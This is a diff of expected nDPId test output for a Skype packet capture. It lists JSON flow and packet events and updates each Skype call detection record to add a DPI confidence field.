 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9oHUAAEARRyvAqAEinTg0DTLdnFUAKQgoezEC\/l8nlzJZpnLIFE7P8fkc8mrPmKIpl9hxLirEQuOc"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4f1AAAEARf6LAqAEib91KGzLdnFsAJDT4ezMCrsyhXN3LQtIkyb75hiLtvYPm8jFPNUJJrw=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qWkAAEARhrHAqAEinTfrkjLdgQkAKiNZezUC\/2slHaKqOmhTH+zKnxlHa\/OJZyFRbGPJo\/ii7tiMOQ=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA13XsAAEARu5rAqAEinTeCoDLdnEgAIdXCezcCHsxzqj9mHv\/LaKdjYymm7xXHyFOeHw=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9HFoAAEARyynAqAEinTg0KjLdnEUAKXprezkCzIUWKH677Ew8QeRY2LFi0olqYWN\/wfRNYM+xO4zo"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MmQAAEARtULAqAEinTg0EDLdnGAAINARezsCntsIeaNpS6NjCmJc+OoOrMkvCcDa"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAABAykUAAEARZUbAqAEi1cezjzLdnFIALAJQez0CXU0wVq4fYZh\/Y+8+QJuiiaVycN5JEmy9Mj2R1c64L1Y6"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lJ0AAEARm2LAqAEinTfrsDLdnF8AJ1FIez8C0TqVtIrtp1zqD0lx1wHOKMmPMNUvlfjRgE8UFg=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4HuEAAEARyLnAqAEinTg0GDLdnGAAJDiFe0ECGzhHlfYpbTJCQlYvElI0z7NbdWF7vdKvag=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Lr4AAEAR0DTAqAEib91KFDLdnGEAK3JGe0MC70klwlgauZl1jUNJ9T6muSj9wXln3SVqW5QyJa+s4xA="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"}
